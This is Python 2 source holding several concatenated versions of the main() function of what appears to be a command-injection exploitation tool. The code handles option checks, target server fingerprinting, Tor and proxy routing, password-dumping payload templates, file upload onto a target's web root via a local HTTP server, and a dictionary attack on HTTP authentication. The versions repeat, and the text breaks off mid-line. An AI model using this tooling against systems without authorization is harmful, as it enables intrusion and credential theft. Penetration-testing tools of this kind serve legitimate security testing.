def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace( ' ', '' ) not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + "(x) Error: You specified wrong '" + split_techniques_names[ i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True # User-Agent Injection if menu.options.agent and settings.INJECT_TAG in menu.options.agent: settings.USER_AGENT_INJECTION = True # Referer Injection if menu.options.referer and settings.INJECT_TAG in menu.options.referer: settings.REFERER_INJECTION = True # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: print Back.RED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: print Back.RED + "(x) Error: Host's absolute filepath to write and/or upload, must be specified (--file-dest)." + Style.RESET_ALL sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): print Back.RED + "(x) Error: The '" + menu.options.file_upload + "' is not a valid URL. " + Style.RESET_ALL sys.exit(0) # # Check if specified file-access options # # Check if not defined "--file-dest" option. # if menu.options.file_dest == None: # # Check if defined "--file-write" option. # if menu.options.file_write: # file_name = os.path.split(menu.options.file_write)[1] # menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # # Check if defined "--file-upload" option. # if menu.options.file_upload: # file_name = os.path.split(menu.options.file_upload)[1] # menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # elif menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : # print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL # sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() sys.stdout.write( "(*) Checking connection to the target URL... ") sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) except: raise html_data = response.read() content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" try: if response.info()['server']: server_banner = response.info()['server'] found_os_server = False for i in range(0, len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower( ) in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[ i].lower() if settings.TARGET_OS == "win": identified_os = "Windows" if menu.options.shellshock: print Back.RED + "(x) Critical: The shellshock module is not available for " + identified_os + " tagets." + Style.RESET_ALL raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" found_server_banner = False for i in range(0, len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower( ) in server_banner.lower(): if menu.options.verbose: print Style.BRIGHT + "(!) The server was identified as " + Style.UNDERLINE + server_banner + Style.RESET_ALL + "." + Style.RESET_ALL settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower( ) == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "/htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower( ) == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower( ) == "microsoft-iis": settings.SRV_ROOT_DIR = "/wwwroot" settings.TARGET_OS = "win" break # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root: print Fore.YELLOW + "(^) Warning: Swithing '--is-root' to '--is-admin' because the taget has been identified as windows." + Style.RESET_ALL error_msg = "(^) Warning: The '--passwords' option, is not yet available for Windows targets." if menu.options.passwords: print Fore.YELLOW + "(^) Warning: The '--passwords' option, is not yet available for Windows targets." + Style.RESET_ALL if menu.options.file_upload: print Fore.YELLOW + "(^) Warning: The '--file-upload' option, is not yet available for windows targets. Instead, use the '--file-write' option." + Style.RESET_ALL sys.exit(0) else: if menu.options.is_admin: print Fore.YELLOW + "(^) Warning: Swithing the '--is-admin' to '--is-root' because the taget has been identified as unix-like. " + Style.RESET_ALL if found_os_server == False: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: print Fore.YELLOW + "(^) Warning: Heuristics have failed to identify server's operating system." + Style.RESET_ALL while True: got_os = raw_input( "(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > " ).lower() if got_os.lower() in settings.CHOISE_OS: if got_os.lower() == "w": settings.TARGET_OS == "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" print Back.RED + "(x) Error: '" + got_os + "' is not a valid answer." + Style.RESET_ALL pass if found_server_banner == False: print Fore.YELLOW + "(^) Warning: The server which was identified as " + server_banner + " seems unknown." + Style.RESET_ALL except KeyError: pass # Charset detection [1]. # [1] http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0: charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", html_data) if len(charset) != 0: settings.CHARSET = charset[len(charset) - 1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: print Fore.YELLOW + "(^) Warning: The indicated web-page charset " + settings.CHARSET + " seems unknown." + Style.RESET_ALL else: if menu.options.verbose: print Style.BRIGHT + "(!) The indicated web-page charset appears to be " + Style.UNDERLINE + settings.CHARSET + Style.RESET_ALL + "." + Style.RESET_ALL except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + "(x) Error: Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL sys.exit(0) elif e.getcode() == 404: print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 1: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 1]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay: if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split(settings.PARAMETER_SPLITTING_REGEX) for i in range(0,len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[i].split("=")[0] # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split(settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Used a valid pair of valid credentials if menu.options.auth_cred: success_msg = Style.BRIGHT + "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL success_msg += Style.BRIGHT + "'." + Style.RESET_ALL print settings.print_success_msg(success_msg) try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print settings.print_critical_msg(err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os found_server_banner = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target server... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if settings.VERBOSITY_LEVEL >= 1: success_msg = "The server was identified as " success_msg += server_banner + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify server." print settings.print_warning_msg(warn_msg) # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : warn_msg = "Swithing '--is-root' to '--is-admin' because the " warn_msg += "target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload : warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin : warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. " print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) got_os = sys.stdin.readline().replace("\n","").lower() if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " warn_msg += server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection. requests.charset_detection(response) except urllib2.HTTPError, e: # Check the codes of responses if e.getcode() == 500: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" content = e.read() sys.exit(0) # Check for HTTP Error 401 (Unauthorized). elif e.getcode() == 401: try: # Get the auth header value auth_line = e.headers.get('www-authenticate', '') # Checking for authentication type name. auth_type = auth_line.split()[0] settings.SUPPORTED_HTTP_AUTH_TYPES.index(auth_type.lower()) # Checking for the realm attribute. try: auth_obj = re.match('''(\w*)\s+realm=(.*)''', auth_line).groups() realm = auth_obj[1].split(',')[0].replace("\"", "") except: realm = False except ValueError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The identified HTTP authentication type (" + auth_type + ") " err_msg += "is not yet supported." print settings.print_critical_msg(err_msg) + "\n" sys.exit(0) except IndexError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The provided pair of " + menu.options.auth_type err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" err_msg += " seems to be invalid." print settings.print_critical_msg(err_msg) sys.exit(0) print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if menu.options.auth_type and menu.options.auth_type != auth_type.lower(): if checks.identified_http_auth_type(auth_type): menu.options.auth_type = auth_type.lower() else: menu.options.auth_type = auth_type.lower() # Check for stored auth credentials. if not menu.options.auth_cred: try: stored_auth_creds = session_handler.export_valid_credentials(url, auth_type.lower()) except: stored_auth_creds = False if stored_auth_creds: menu.options.auth_cred = stored_auth_creds success_msg = "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL + Style.BRIGHT + "'." print settings.print_success_msg(success_msg) else: # Basic authentication if menu.options.auth_type == "basic": if not menu.options.ignore_401: warn_msg = "(" + menu.options.auth_type.capitalize() + ") " warn_msg += "HTTP authentication credentials are required." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you want to perform a dictionary-based attack? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) crack_creds = sys.stdin.readline().replace("\n","").lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker(url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_err_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" err_msg = "'" + crack_creds + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Digest authentication elif menu.options.auth_type == "digest": if not menu.options.ignore_401: warn_msg = "(" + menu.options.auth_type.capitalize() + ") " warn_msg += "HTTP authentication credentials are required." print settings.print_warning_msg(warn_msg) # Check if heuristics have failed to identify the realm attribute. if not realm: warn_msg = "Heuristics have failed to identify the realm attribute." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you want to perform a dictionary-based attack? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) crack_creds = sys.stdin.readline().replace("\n","").lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker(url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_err_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" err_msg = "'" + crack_creds + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: checks.http_auth_err_msg() else: pass elif e.getcode() == 403: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "You don't have permission to access this page." print settings.print_critical_msg(err_msg) sys.exit(0) elif e.getcode() == 404: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The host seems to be down!" print settings.print_critical_msg(err_msg) sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The host seems to be down!" print settings.print_critical_msg(err_msg) sys.exit(0)
print "" err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) logs.print_logs_notification(filename, url) if __name__ == '__main__': try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Local IP address if not menu.options.offline: settings.LOCAL_HTTP_IP = simple_http_server.grab_ip_addr() else: settings.LOCAL_HTTP_IP = None # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 1: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 1]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay: if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname( os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write( settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace( "\n", "").lower() if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile( menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write( settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str( settings.LOCAL_HTTP_IP) + ":" + str( settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: if enable_HTTP_server == "": enable_HTTP_server = "enter" err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err: print settings.print_critical_msg(err) sys.exit(0) except urllib2.URLError, err: print settings.print_critical_msg(err) sys.exit(0) # Used a valid pair of valid credentials if menu.options.auth_cred: success_msg = Style.BRIGHT + "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL success_msg += Style.BRIGHT + "'." + 